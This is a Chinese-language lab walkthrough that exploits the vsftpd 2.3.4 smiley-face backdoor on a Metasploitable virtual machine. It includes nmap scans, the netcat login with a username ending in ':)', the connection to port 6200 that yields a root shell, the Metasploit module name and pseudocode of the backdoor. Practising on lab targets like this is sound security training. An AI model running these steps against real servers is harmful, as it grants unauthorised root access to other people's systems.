笑脸漏洞

目前网络：mp和kali都是NAT模式，连的是手机热点

在ifconfig得知本机ip为192.168.75.133，用nmap扫描网段

nmap 192.168.75.0/24
nmap 网关ip/24

┌──(root㉿kali)-[/home/kali]
└─# nmap 192.168.75.0/24                                                                                
Starting Nmap 7.94 ( https://nmap.org ) at 2024-10-25 11:09 CST
Nmap scan report for 192.168.75.1
Host is up (0.00036s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
2869/tcp open  icslap
6881/tcp open  bittorrent-tracker
MAC Address: 00:50:56:C0:00:08 (VMware)Nmap scan report for 192.168.75.2
Host is up (0.00022s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
53/tcp open  domain
MAC Address: 00:50:56:EE:63:B9 (VMware)Nmap scan report for 192.168.75.132
Host is up (0.0019s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 00:0C:29:8F:5D:C1 (VMware)Nmap scan report for 192.168.75.254
Host is up (0.0011s latency).
All 1000 scanned ports on 192.168.75.254 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:FA:97:6D (VMware)Nmap scan report for 192.168.75.133
Host is up (0.0000040s latency).
All 1000 scanned ports on 192.168.75.133 are in ignored states.
Not shown: 1000 closed tcp ports (reset)Nmap done: 256 IP addresses (5 hosts up) scanned in 8.10 seconds

可以看出来mp的ip应该是192.168.75.132

看下每个端口的服务是什么

nmap -sV 靶机ip

┌──(root㉿kali)-[/home/kali]
└─# nmap -sV 192.168.75.132                                                                             
Starting Nmap 7.94 ( https://nmap.org ) at 2024-10-25 11:12 CST
Nmap scan report for 192.168.75.132
Host is up (0.0025s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login       OpenBSD or Solaris rlogind
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:8F:5D:C1 (VMware)
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.45 seconds     

利用netcat与21端口建立连接
nc 靶机ip 目标端口

┌──(root㉿kali)-[/home/kali]
└─# nc 192.168.75.132 21220 (vsFTPd 2.3.4)

220状态码表示服务已准备好

接下里输入（用户名字里得带英文键的:)用作结尾，这里以a:)为例）
use a:)
提示331码（表示需要密码）后
然后输入（随便输入，这里以123为例）
pass 123
在显示421 Timeout前

打开另一个命令行
用nmap扫描靶机的6200端口

nmap -p 目标端口 靶机ip

┌──(root㉿kali)-[/home/kali]
└─# nmap -p 6200 192.168.75.132        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-25 11:34 CST
Nmap scan report for 192.168.75.132
Host is up (0.00048s latency).PORT     STATE SERVICE
6200/tcp open  lm-x
MAC Address: 00:0C:29:8F:5D:C1 (VMware)Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds 

可以看到是开着的

现在用netcat连下6200端口
nc 靶机ip 目标端口

┌──(root㉿kali)-[/home/kali]
└─# nc 192.168.75.132 6200     
whoami
root
^C

连接后输入whoami
显示root
说明此时有了管理员权限了

在mp上查看该漏洞

输入msfconsole打开mp
输入search vsftpd 2.3.4

输入
use exploit/unix/ftp/vsftpd_234_backdoor
info

脚本：

/* vsftpd login handling pseudocode demonstration */int handle_user_login(const char* username) {char user_buf[512];strncpy(user_buf, username, sizeof(user_buf) - 1);user_buf[sizeof(user_buf) - 1] = '\0';/* 检查用户名中是否包含:) */if (strlen(user_buf) > 6) {char* ptr = strstr(user_buf, ":)");if (ptr != NULL) {/* 触发后门逻辑 */if (fork() == 0) {/* 子进程 */int sockfd = create_socket();bind_port(sockfd, 6200);listen_and_handle(sockfd);exit(0);}return -1;  // 返回登录失败}}return validate_normal_login(user_buf);
}void process_login_request(int client_fd) {char username[512];receive_username(client_fd, username);int login_result = handle_user_login(username);if (login_result < 0) {send_login_failed(client_fd);}
}

• 在用户名中包含:)字符串
• 会触发一个特殊的代码路径
• 会在端口6200上打开一个后门监听
• 这个后门会以root权限运行
• 允许未经授权的命令执行